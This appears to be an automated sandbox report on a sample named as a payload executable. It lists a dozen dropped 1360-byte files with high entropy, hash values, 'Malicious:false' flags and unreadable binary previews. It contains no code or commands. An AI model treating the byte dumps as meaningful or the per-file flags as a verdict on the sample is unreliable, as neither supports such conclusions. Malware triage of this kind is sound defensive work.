                                                                                                Preview:LTKMY..]a.6.._.}^.?v.i....".....%...I.G....I.~...J.t.=Fl..2au.1..i.F\..r.j....m$.......P....5+.J...#...Fp=)W...Q.....U[.2.c.h....M..{...p..t..'KH......Mxl....",.82G....mT?YX1..h.b....!.5.W.F.~...5..f.lS...Kb7.T%..F...#.J....?..?...us9.......h4..uV..{..j$7..l.?..I.V.....y.c......G..l...1...[...A..%W.C.8:u.....7.u..q.w.ML.dGs............T.1..._...$.......,......eE....X..)4...M..S..br...I...5...E.Ug.M...hi4U?.l.../...,..%\. ..Ss....C%...V@._.;.c.....m`%.vCA.nZ.L....el.lL.......'i.....>B(.'.?/..9F.D....q!.....3(..2....01.[0.j.1.r......I...A.4..0n.4zYxo...?...w.Z.......RZf_.2Y..~L=@].}.E%....mn..e0P..A.2a6.._..)...rz...:....q..Y.n.0.T......d.~.=Y.a.A3 =."........?q.+...gl.....]L/../.L.>.?.3.p...)X.....+...^....'... Ho....}.....1...m..u2{).J?.)8(.-...#rS....G..(.n....x...(.z.3.%./... .Ft.)...B....~.j.........}.:.._[......2.3!.....M.!...9WY.../.k.r.v.s.......a..~*,...=.9..d......Y........W....h0...~x].R....i.(....*._..Ar|..T...1d.T..G..Wo)..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.835498463701812
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:IaF//I7SWVRf+7I9Pt3/YtlVvL9bQg7eBZliT0A3E9BURJ66wf7z6x3bD:Ia6znPYtl1VQg7eB+T0ccU257SLD
                                                                                                MD5:3435D88CE9A97D45687290A2E7292CBB
                                                                                                SHA1:99BB52C84455D1F145E942D0F1A2178B075FF128
                                                                                                SHA-256:25B23D5A24FDFA71B3675B15B77456AF657267EB0AC3911CA3FDB9F70CBB64F1
                                                                                                SHA-512:BA1E396830E31685401AE18D82E7792D9C1AB16AD63BAA072BDF61E5948A50380DE2342E2DA1B0D20C3BF2C6B308E77E6A065EC3CA1F796FE9F2EA662D9DF185
                                                                                                Malicious:false
                                                                                                Preview:MMYRL-Q'?.......S..2,../....../.+( ..B^&..xk._..!CM.....5|.r.!q..- .C.]jp.$.U.Vz..P.l4.,..*N...{.G.B...Z.|.@.f..Fj.1D?.m....x.?...2.#(.3.$u.b..'._.\....*...`OT(LD.<......vNc4.5o..w....".%.h9..Sf\.#p..;c.lC.......i.B...../.%zg....+..R\+..F.W...i...(;..^..y..r{c-..>.O.....L..).].w......m...IY...5..\.;..V...h.G.V5R.^.?M.^5..\_x.vqK.... .>W...<.z.FH..t.,...).d....fg...j....S9....0....j|^k.P*pH`.'...x..Er.9@...=.....z...Sb6..h.4/.e.y.C%K...r..b..^>..`0#..|...'.Q..o.8g.A.W&P.S...5...a..0......c..L....I8G..B7...f.XF.-R..Fp.@Q....i.c.....x.Q4.....DY}.V..?.y...R......M.].1K....pe....n.y5K..r.J. .......@_..AY."..BQ......"..<.....-VAwQ.J.3.$j.G.........BaJ.N}.Z.<....w......D.A...#.zY,...R...z.... g.?DT../j.;........3..JMy.3...F.dh-.Q......Rw.....K.YI...D ....F4p..x.rn....>s........s..$..6.....:n.68.6.>M{.....yo.9..*W......6.M.B.6..]~.73.c.Q.%. .A....AD(.$....$H.M_..gt.guc...h.....V...)hm,.....\b.P.<[.-.#..F].=.....!.6#...8t.j.fD...2.v..}.ti....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.845581082541169
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:mIg3KzQgfFcLrPu6k+BOJ3vkiqaNbIi/I7AKzPcmyLYFaAI+XJ1waD8vRkn2gx3X:mn3orNezHk+BevkgbIiPAEdsFaADXzwu
                                                                                                MD5:6377152E1696F56C335E00C95FB9B5C7
                                                                                                SHA1:00D12749063981276113B0A9A4791FE69D12B3EC
                                                                                                SHA-256:27BA94F8408C290F7FBF5BD09E7D4261B70B0FB33178E0C18EB897479DA7E103
                                                                                                SHA-512:E9CADD0FC71DDA45D88FF2B8E7F31DD61CF24EA03CC48D3E186C4B53E2376A045AE27EA457F7342A335256BAC1E9A1967E57E90C171F8097A83DED154ECDDBCA
                                                                                                Malicious:false
                                                                                                Preview:NIKHQ.....3/.m1...p.....&.l...K...3.W..U/LN.%..G.....1.knRZ.!J5.E...7.........\5... ~.t.?..).....M../7w..9...+.. +.%.......p../.F..'...E.^...)..&.......{.B..qzQ:z....R.|$6w.s..o...2.\f.. .....t...2...t..3HH..$....C....7....U.q..eG......x....W...*;l.1.}...m..n...o.....v...<kE..=--..3..){...&......P+c.>.<......&..z.s..q6..S.....4.n$..U[$.i....S...Z..qS.S.$.d..#B..T<.a.w....{..4BS[,.cD,5#....lS..r.....{6..n.<.f.~..su...W.hv$..ZF..C......^.Ty<....SD.K.q...gy.q....7.O.7.Zd...".;.s.UH.P..y.y...1........CR..=.H./..-e..I=h3......0..1w....n9.{.l\p..8...RF...[I.p....P.UY.S._..#....Qy..YW[.p<....)t.-.x.....{.N./.B...*.f....%.l?.....x|^H7N......Z\j.$L...@......W*....I. ...g.c,:M..(.U.#..=.M.6......:....J.%..O....]..6........Lv.N..A*..@...N.B..|l...EFh|...V.E.M.>......,.E....>........W.. 3.....0T|k#."/s.<....../M.r.4V.G......'t.... ..jc...E".`.V........N.+,.s...[...'...D......j....Y..Y'.......z..:=.T........lc.K...mB.Y..b..5.m.+5..P.L...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.859516653558437
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:88UaavzSwcYlDPHr2JKe7/CyigkL0hTridyWYhZZhU6p6FZM7gx3bD:eQwcMPHrAKe2yiN0hOaM6w0QLD
                                                                                                MD5:A686EA8E153B12B01DF6CA0AB0CB5FEB
                                                                                                SHA1:DD74C0CE6F0AFD2B10FB7B6F47E864E96134541D
                                                                                                SHA-256:BE9B2134A81404C61EA2CD1D2B6B1A030AE180AFE2814331EC2137C9BC3FF31D
                                                                                                SHA-512:FAF081F891EFC1BDE1AA7050419C0CFB53A63959FC67AFA259F6E1C4BF4655182B12DF0E2ED45AA740C4A5607F5EFF0B1DEE52F6931504FAE5ABD0B8F6729597
                                                                                                Malicious:false
                                                                                                Preview:NIKHQJL..d....(..C{9@..O.$Nc..X[...e'D...a,u...z]....e..?.U...y.Om[...>.!.u...t..........KT..........G..q.....Di..Z.$.l...........Yb.tWv]........+.r..i8.b.M=.A....^1e...:.dU".y..Ww......wz.f.b....F.0uS).....i7.oK.|....P.Z.(R*.:.\....O.!.U.<..3,.{..bIsF.E....:.e...FQ...s........0....T..|..".p..pq.*pw..(..K.[..1R..sW.e.$.f.'..2NN...a.*.a.....Z.t....Y.Tc......Is.N.?..b........11..X..p.,2T1O)..bSV{.h..S.|.!.4..V$.!...Z.y........p...\|......<.e.d.w..F.r..c!...#..H`Jdk.....+...J}...a..H.K...8$..F%.!..`=nB:..|.?l../R.LQ.0..$-0u...&r[.j:"]V...Fx@O..e .....=...a}...?lB..(.....K`tN..k.....H.(...j.*g.....^K..~...........\..r.{.;..M..@.}5.+....^|.O..3m.z.'..vm.,...i.!./..2i.1`7....@Q6k.e..c&..K.cL..}p.~."..+J.A....^3E..T.gX.|>..y...1.../u.S.$..h_..../.(..{ZB........JK...3.:.1..'... ........B^.aQ#j.....J.N....;0..A...O.....x....{.#\... ....+...0$w.k.M...|......?<e...l.5W..2.m....,.<(.Zb..."....H...,(.[.q.<..#...L.A.....Y..8Ie...0. J.i...p../:......J.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.859787612861311
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:MVcTk4Tm5ys7pqMu+kLwWKwhkE/MGhMyE6aJWH95lehxO6Rx3bD:MV5b5ys7swWKwhprE6aJAMO6LLD
                                                                                                MD5:CD3CAA4C987EA11A2FC784BD37F93783
                                                                                                SHA1:703F75319A8E452FC874140B55AED7D139A51754
                                                                                                SHA-256:3AD9E179D61D84AFB461E42112BA9445F7C31807F8DD6CFD0D301DD951D1DEDA
                                                                                                SHA-512:5ADF90202929541C4E22F337CF9BEF0040616D0C17742801E35E8289DBAC7DBEEA55E7101C4A23C27E60BB4501607A1568135D01F9152DB668B3D4ECA4BE5B07
                                                                                                Malicious:false
                                                                                                Preview:NIKHQ...z.Fy.C..y|K.;.+.e.H.%..iN....:2.|..O..Zzz=...Aci.Ry.E.....'..p..;+..g...y.#. +..D.h..k1.....\.R...cJ.s.)f.gDA..._v.-[..*.A....kV..@..>...J..6X..e.S...\O...$].#..2[.r...,p.....}.H ..2U.vpsg.hD...ed3.."*,z.x..{...y..A..O...!eq..."..].....;..I...O3.........W=...6..[.7...O......).P`..Vz.....g..&..(.AxPB.g@.N..f..A#[..&.I.qc.<......?.%fv.....^Di.57c.j....-....{././....5.OE.hL....b.11.._USn..jv.3L...x.O.42.t....%.. ....].....:....0.z..()EbX.P....J...eB.).I6.....<.j...l..#~.A.3.I../. .4..E@%..0...y......~N..s......<y..uP>...t..j.....CDjM.....].....'.O.+\V~?...t.u..G.G.vK. ...:MU..d.....T|.y*D.)..I.......+.....5..."..;..;..-...).....+.p*/.}...5.4......Ar.C.5.9.iw.......SG.)x..Pb8..B...\.QK.IxQS.......t(...lj$Y8.......U..Z.<.....+.%.`....H2.^..\r...._.4..g...d.t.c......-..V!3.............?.i....i.@Z..e.w..4*.D#,..z...*.C...S).s....'.....$.......z.F.i...Fm.9...Nw./@.....=.*......%.1-j.4.8....}.R..wT......Ak..R>!.S..%$....7.{...w.l...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.871084367843063
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:JqH1PjrSgK058GzgiBjNVbwJ1Al3d+39Bo2yjUAcWDLBtMXjnHSzx3bD:gYgB8YgiBjNJw/L0jU0MXLYLD
                                                                                                MD5:E3EC8BA529853DD3E55FAAA1C9114A04
                                                                                                SHA1:D8E5CB81282BC504FE8C9AE33FC5A6C24C44E613
                                                                                                SHA-256:7393DD52931AFFF31F03FDDE269444A35FFDD40F8661495A009383F6FA5F1290
                                                                                                SHA-512:05E69EE7AE0CD90F78A513883195EFDFB84E1E66FF4E0218DBA91FA680E960DDF45BE48BE119C80789B511B27DD69CE97EC5FFC10202CDC89E9FB7731A6DD769
                                                                                                Malicious:false
                                                                                                Preview:NWCXB. ...N...l...Te,6.|...H.'^..%..t-.....pZT...2....w...EH&.e.`.L+..M..*.J....-.aH.f.t..!...K.J..,..;.C.V.........P.......j.A}.H;Z.....M.P.....L5..$..S..6.40..."..L.........7x.$.../I...h..f.\...U..d.........}....g..!9.L....._.......!2H...X..|t/..........s).......U.2......3K..85.\.Y/..?T..."...1.@..........."x.gK1.....F..)@..C(.P.#I3.'..*UCl.F..stD.Q.l......(..^i.i.....DI.....GUQs._....C..t...U......<5.. 9.....AG.r...@.D...%....A....3.c....xL.......x+..7......9g<..}...:a.....Gn.B-!u..../pK,oZz....r..n........=.O...u......Q....k..j.f.d....[......k\u....c*....Kq....K...y^...h_..|P.%?{.e.zHK.....4..i.z...d.`.8.9A-.;...k....RQ......-..#.C.......N.{..0T..f{.LP$.\Ie...N..#.M..4..O....{..9.8.F..;....W...K=.A.m.].Z.Qa.>|.w!..p.#].2..`.....S..._.......A]).rvy...a_8.qO...t37....Er%..5IwP...O.:......;u...N...;.k.F+..f.J6..wMO....1h.Zu...Y........R.Jj.T!,....@v.s..i...,q.8..}\8%?....l.......}...Y...9.?!.h.*.*.Z.R....B,.....^.....{n.1.Q. I.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.834008681982192
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:CIkIcXG1NkCN+iB+6zWenHs8kjaCGx7QM2ky2UbMGep9BWBBxeUBz1x3bD:91P8iEiWenHrcGx/2KUb6pZofLD
                                                                                                MD5:3DB2F3689EC383EB1052DB5E68DEDC3D
                                                                                                SHA1:F4BC1A2112F5D3BACD0081B962B3A63366C695C7
                                                                                                SHA-256:2555FED1444908E12DED0517600A6C652638F826F0BF22162BC29C51B6639A98
                                                                                                SHA-512:7ECFE89459E53A9B9A82B92D02E29A7722140719C39897C75695EFF89EE04FB3CC80E704651DD30B351AECA454A082B179CD00A75D48AD061102D0FC12A2A011
                                                                                                Malicious:false
                                                                                                Preview:NWCXB?....hC.l*'R..%..|....._N.%.>mF..D..S........M@XB.....&..+...u..U..o.8[..y...@..b..ta..K..H.......(5..$....h.5*.jzS.C...m..../.a...}{e..u..M.........d~...4.T(..:.}..;|i...v.....{Dr.t..F.. .&...H2w}..y...&=;KP.U..7.'...]]S..*..&..G.h8Eo/...c...y......Y...y.'.>l.J{F....Z..).H.....@.. ..g,..*.#...........F.%F......<..}..^@....~]..jO..t..).F....k.k......g....).6e.i.u.|C.{..W8...0.i....b..........IC..yb...\L..._%......E.[.....=.Zk>.I..::vR.....T.5..T..$2;..@.>..Sps.3!..~..BG&n.V..'6....7...m.i..Y...+b....^Z..vH.:" .Q..........8<...k..e....H=.........'..Yp..=xi....X<..)..a.H&n1....*.....gK.b.X7..h...r...U...D.......3.....t....=..B<..."J..$.......9....W..w.]vQ.....z..z<..A..B...........+2.w-..-....<.......v...MQ.8I.}S.)..D..l.2?....J.{..B1]..,I8..H..s..a.6..r.0..1..>.-,...J........e#.]z|A..g..'J...a..+Q/..w.p......P+...@..!..>RJ.....(Vs@Q.1x.!......g..@K).Q....I....F...~.z;T\..6...8Cg..z....)K.J#......b....nD._9....rj....... .........
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.817182787654571
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:f9n+Vhq7FsnVQebLTfBA6aAklksEJRac1hqG3JplC2twDqSx3bD:f9nO6FsnVFbf26aTl1G1h1njAqmLD
                                                                                                MD5:8716472FA03750F2A9B3E79308B8918A
                                                                                                SHA1:63658CCAE05B5DE7EB2EEA414DCDC128484776E5
                                                                                                SHA-256:A5D28805518B4D6EF1771FCB876C0D75BDE3C0F52846A5E0E8428BB578C116FE
                                                                                                SHA-512:A63054754AB1AEADC64646B5588A5286F07980C57726D2F5DE8BE33E966D9612FA04D4D51B3123EBD85D3558544D99CE1304BCE6FB575C62110062304A1B0D5F
                                                                                                Malicious:false
                                                                                                Preview:NWCXB+.KGl....cu..TJ.b..*_j..g]k.\=..j72@/.d....2.V..@.h..j.Rt*o?^%G.|..A..[...hl.....}1...o..f}....:..A.k]..Q.kX....W.aSE.. ..w..`...Ob.k.V.%.}.6B...w]....Ce.#!...h5..^....oZ..!..T....f.....@P&[..".u.wN.[>..\.Tl4~..D..FI.A/.8+:.y.u.4../N..r....6..o.r.....i.'9.Q..-G_T>.Pzuh.$..i....2....5......j.~...>0v.Y.4.[B.{F..... .".c.....j............Zchi..Eu...x@$.=.u..j...=.k&.Q.tG.Y.K.^..M.......(9.9..I.@{..f.....l+.k........R..'".,.;.>.5R;..:D`Z...{G....9l.CI...C.nC..{sR....\.0UC:..\Y.Rvf.[.u;..g8.lKu...p;....</.B>I.......[....t.l.A.....:2W....c.....>.zh..i.\f`.<4.T.e.a....>.y..~F.M...A..0.:aCP.U8.(U/..hu...#5........`....6A#w.I".i.>..-oNL%w.Nd..A.t......e..y[...C+~/4Sl..]q(R@....a(I..W.J..q.G..2..M.<./...M.../#+l..u%>.@T...^.U.....o..l..]...c.s&....0m.Cr3+.y.P.ho.Y.........0..V.P..Y.U...i.Y....]-.....l.v..KP.b#.3.(.n...I.`.....~.K..MCT.*..'.G;..z2U!...$7T.;.....6gOZg.LB.,.....Xec.N\.....0......T.n..v.........@.rz!....2G.lH...qI..E.(.zS..%...A?B
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.8490171597200895
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:0Jft1SjXIYDhu0Whr+GwoOdWVcyWq3myYAuAkx0/FFDZ+2XHwVwEdRUZSx3bD:0Jft1S7Vg583sv2ykAfp+2sdZLD
                                                                                                MD5:4D1EAFB8E0F592AB75F8CDABCBFE500F
                                                                                                SHA1:960B9943CED43085FF8F1BF956CBAC1906D046A5
                                                                                                SHA-256:5ADD3C95909B5C2C8543B0B0B5575AC9C77A78F5B7647EC5BA2CA3D2E728CFFB
                                                                                                SHA-512:F56F7D864E08B4D22046D85E9B1CE7B2C3C3ACAA6A73B54FEBF5CC9CB596F2A700528DBDFF9EB2F573ADCAE6F59FABEABDCEEC7CCF8322AB295C709F46B2BE34
                                                                                                Malicious:false
                                                                                                Preview:NWTVC.....~.p3.......{.......}.Q...a.x....c~...v..;.E0......[.1}y...".;h32(.........f.........#..AG.......D.8......6m...[...*.tp?)/".v.V.(.u~A.0......V..E......z.:...x8.......j...A..L*.C.?0Q..r.wL.....c.....X.........}..b..kB.$.....[ ...d..g.X..+....@.......rp..<..=q&.#U.O8F...y&c.xX. ...v...u.....7.4..n?S......./.b}...3.6$.... ....M.Z.XF...3.9r..t.,......H.2..GS'.8.y?.W.|iC........`.).5:...3......MK.....1#a"3.H............`:...s...kQ......Cr.._*.D...Y....Gj..N0.U.8..1.xd..L)8.9x....dH>.....@.3_...c........<W....J.3..M...T>O....Fc.Of.....XG.k7O.sl. D(.....lv.u..l\..w..U...5K.......I...iz.#.2,...s......O..'......d.....]'..b.G...{.@2.....q...3.p[..)....M^S....r..!."-..,U...8..D....wwA..LG..s..d...5;<E..^........+Y..........:...(X....S.7\..W....O..d.$...q...o5~.'...E.^jJl...}......Le..n.......$.1...*.M..i>.....~M@.....$}IX.QV..C....(F...3.*.B..h..~..".\.d.....wR...H..#R..Gz`Z. .MW.7C:OpX... .R..A.oD...ptw.[$.'..W...q_,.>D..LN.o..I...@M
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.859055169786997
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:w5+LxeEWLD5Tl2MBCuIvp9SXF+qQFjuXs42CAwC/DoZcmrWxvi//x3bD:wMWLjNCu0yXFUZuE19ccNQxLD
                                                                                                MD5:8F8DA3C0024CA80DF9E021E3B566BFEA
                                                                                                SHA1:749DEB37DD1F5D2A6B2BEA2D97076E24E73FE650
                                                                                                SHA-256:796BDFC98644D96459735A11C02E7A5620C39E5A1675C74A2A634D74269C4A86
                                                                                                SHA-512:943F067D5B2C57E8C022D724B7C1E6E4A16CC20043D9D19038DE928B8A8FF1817BB55477621ECFF31A0DA44E9D8A805EC6591DFCFC75BBEF550DD197B406695B
                                                                                                Malicious:false
                                                                                                Preview:NWTVC.J.v,.0%.~..c....S...e.<..Vz....!.t..f|.H.'.......l./=..z......WD._.y.j..TU.W?'...:J{$.H...."....v~..0...@E...v....p..hb.,P........F......._..2/.....vf.H...:..D.d.(.G.aH=B..Fh.#iS.s..........{.w=.\..m..c..O..B....&V..w.H...0s;f'...|.=.....qE.c<.I.3.(b..B&.:.+G....".o.X..<..[..R..T.G.......m.#.b..e..<...t...!.V...j...S<.......eR6....P.s...u>.3....=.......@T..`~....A%a$.F=..p..Z.lO..U.t..g. |...X .l?gPR....G.oD...&v..<..V......... <.....m...Z(t.'T..}a...2....Pm.5.....YL}u.Q.I....[bGC.|x0.)P....tUm.Sn...+"3.`~.w.....T5d*r.j..b...0...w9=..%.....E.nb........G.....^V... ......3L7.~`q..W...K2...v.D...J....=..Oj...,..t.YN'....W..P........G.T..>@i.,[.........R.g..3@`!..j7P..<.ah0....!X.....pa..wp...q.t....`-.O.P.........'l..o..7.l`.cA..T.D;..>...Y.t.B....n...p..2#.c......_....+<..`0c.QL`.{x(....,...Jp.p*.....s{9:...z..L...+.....iR..'n.w..#\.p.l....:^.e. .}x/.A...;Q..O.......L...}.L.fH.J..D..M.G.Jw.I.}...K........2U<......I.z.6. .A.(.$.....a.^1
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.862669966458937
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:iFDOYmUjheX2rEkhbedY+R8bZGBBiauTIcpsK4SegQ1pYn3YEaRHHFN3eF5x3bD:iFDTfEkhbt++bZGeaaIIsKki3LuHlNOh
                                                                                                MD5:7D4E66472959BE2A466A65B761144463
                                                                                                SHA1:EEDD7DCF4473700072E6800AACA01AF78FF7A0ED
                                                                                                SHA-256:9E7384DA92F6826D35383F09080B7F9F88DF7F176A0F4CFCC60D5050D50F0506
                                                                                                SHA-512:E29EF62E7986ABB9C6786D5B442965B3CCDF0D395815095F7FD341BDE7B25D8AA9E997A017ED5ABC10067BBDBA2552559A0029D397E15DF77CD5CCD6F858A1B3
                                                                                                Malicious:false
                                                                                                Preview:NWTVC..`..Z..r...=..,72).U..:....\..T.F5.I.>.R....].............wCI...D.1...".+l?'...dP.k.s.(.qk.?.|......=...S=f.........K.b.....5......0..s..q< ..`..c...t~. ....6...<...@. 6.1...p....3...GeqV..&"v"..P.2(.d....$+.*..s"j.-vN...<j....A.J.=....M.4.....}.;..........k..........\..V.@.WZoo..R.R.......*..C.\....#rJ#(.@.'R..wS..i..p..Y.v{jk&k[.".]4j...V..j..D.e&c.q..:.xEE&.mIo.;........-...#?..."PVQ..>4..Pg.).Vtx..&...'.:../y..'.Ri.}..$*^-...g.31.[.....Y..O.u'.....O.!..B...^J..h.((....;....y...R....8.C.b.s.F{.N2g....}.F'.......l/.e.}.bZ..]..^.M..8...gH.%..<..#NSf......L._...r..)...r..v..ZG..*4.....%O.......\.?...O...v.:)..4...W.4....U.k...b..]'...z.&.....-.X.@..._......p.VZR<gxU+w/.7.$.....I...mk8..S.N..s.u..\Q.=..._w...:.._..~QG......nE.c].C.. '[...phx....3.....1....":._..]x.L.v.{..m.SBO).v.e_.......b.l..Eqhi..`".%..../z.c...L;..>...{Jh...V../]....0;..n< hg.H.p..ri....Z.Z[.....YFoC.j.r...>....F..D..~.Lm.R.g|..M.../..7+...."..s.X..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.824755173952534
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:BOXRaFedd44YPW6ezCtu0hF0FXQEfr9aF/n4Zw8A4/E0ln3KV6zCppBD89Ukx3bD:BOMFeddvYPSIFhF0/T9aFf4OM/t3k6zh
                                                                                                MD5:F5024B64CDCB019878AD954C86F886E8
                                                                                                SHA1:B68AE17A07513D8EC3ED7E513AE98E483135F296
                                                                                                SHA-256:A66D2989A9C976095F71B5E6B7EFDBEA800E2EB3BD0CC086449C4367C79BD167
                                                                                                SHA-512:69E3DBED2433ADE028898C23C5024A17209759872D1B2C6602C1FD07BA5232372F1A14D193430F8E8241A3E6AF7D013792A2DBAC5E33EC574F6CCB895CF5C0B5
                                                                                                Malicious:false
                                                                                                Preview:OKWJN.Tt...")j...{...8.....W..g.A...+2.j+}._....VZn.>...Y...;h..q._......F...WA.s(.L,.}..{...._. %.......n(.,.u.\.o>......3..%\...Z|2...2J.Vj.......b.!#l...q'..J...F.....$.e..<..9Lrc....y.)f9l....q.4...V....y..<}....!.X$....|.A......J..bP.Pu.<.r..^...}.a..^.. .?B;.q......N.....uJX..U..9j;l..4..K.!..%.....w.....$...k.V.3s4i..../T...'8....z.....B].k.)/....>.k.=.h.J...x.Q.....Y...J.n.c.'....o.........S..f.........fc../....(....P..:(-..!.........U.U.K..{.B.X...z.=.)...T:.......X...Q..}.z.6.R.....[G.O^)k..bx....(....E..S..A...UFW..6..s..0..R...q~.`Ky.X.;.....s..#6BU........3O8.Nt..L%.o.t..{.4..K.....Z...P....<.;T..q..#%=....5*JZ..n<o.:Y~.6.%.:...-s..(x....8.e...l.bx...Ri..c.....v.....T........L3..<.9_.b...4-3....5.,.*.q>:yi..)4.|....;..+....2.t....Hi..kQ,*[....(....Q...GI.*l.34.U.......}j..I6..'..d.7h2.....0_.O.S...(..v0.}..w. k{......d7..RS....g..,*]....e......3.3J.%.....J..?..H.....M.n.-V..On......u....,....T....D..Y7wC.AAc..8..,~.h1H`
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.835647257737005
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:mNyrkfKzWhseE5WGo6RD+AoTXUwvroCycKSTlNIIsHj3jWk8ZehYEX7/Ex3bD:mxfKzW1EQGokDgNToC9VTDIIsDTZXsLD
                                                                                                MD5:EFD026E8178A46562A68E0A312F72D45
                                                                                                SHA1:C95228A519FBE73E24D4753E9C8EAD1BC2E7CBCC
                                                                                                SHA-256:1DBA6C7DD3737589B27791674A4284B7A7D59041532C673764C725A8E1E7AF0D
                                                                                                SHA-512:A7D37496EEAC0B16C991DCE5D415A03EA1893E3A9D7408479505DAB30936EE8CA2BB70DFC41D1FD2AA83B52300B8A9A9E2473E4AC59C9CEB2F9176C20BC4B8A9
                                                                                                Malicious:false
                                                                                                Preview:OVWVV...\...O5.a..@..*...E....!j.u....g/......~O.T........t.....@.ic#..#.%.N./#"i..* Se..Y.....{.g..`.s.4.{8..`.$.].......To.M..1.......O..........C.y......X.nw.N....h........B.J.LA.gY\..p.z..q..4..u.*.....-.}3{..x.e.34Q.5x.`.B.@....O...3........^RR.[.x....4.r....._h......~.#......R8...._...GV...N.X..F........]...X.....t.").W.&...f.`'p..k.v..&.......r..\.i2.......P.k...K.p....c.l.a.<0..u..w.rX..>.aT..1...O...Z..;u.#R..Cn.^F~vfP.}.5.....FY..a..6@Q..DwU..P..A.0 ..n..:.*...E....u].....YR.f..5I..M....=....2W......UG.F.L....J.1[..;$...@.....@.:...(3..>......{csO....G..4-B.8...%..I6<.F}...s.V-).Yk...*.......m.X...H.@.Q9...R0.....|o..*..T..nE.Mq...W{.u...e.B....X3.P.-lqB..'.{>...F.q..K...8l.w.1...\....@./......Q.R.<.S."mI[T.Q.o..zK.u1...%t.E.?.c...\,.U...R...].}?..B~..!..5q.d&..O{?.X...5N.,..4YL....E?.@Xj.Mn.d..v.3.........M5.5..X.....,(24.V....;..}u..P....)VL i.....h0......-...le.=~w|.:\'Yb...a.-....]s\.t.M...jY/".FOix.......+W.....j..h.v.[..1[....p.....n
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.844596990498227
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:3PfdVPjrLyHPXrmOqtzLUohMcN9cpPNM6HQeN2vS9fuE1PBu0C/t6AIab21ax3bD:3PfnHyHjmHZLUohpNqBDc0C/t6NfeLD
                                                                                                MD5:3705E715AB42C82C5C6BFF7E2CD79EDD
                                                                                                SHA1:F222901AD29795CCEAF3DCCF67FB0B137ECC66C0
                                                                                                SHA-256:930FB2A2933D161B082AAE14D144A48FF738250DB8F65090BF89BBB15E88C681
                                                                                                SHA-512:96A7D0AE2CDDE1AFBB6B7B3C659B89A51E2711BD5FD8807A45515BAD6FF8E21C92942DB1F16E762B97F79576623C7C787701B40F933F6B741EEC79CC031B8FEC
                                                                                                Malicious:false
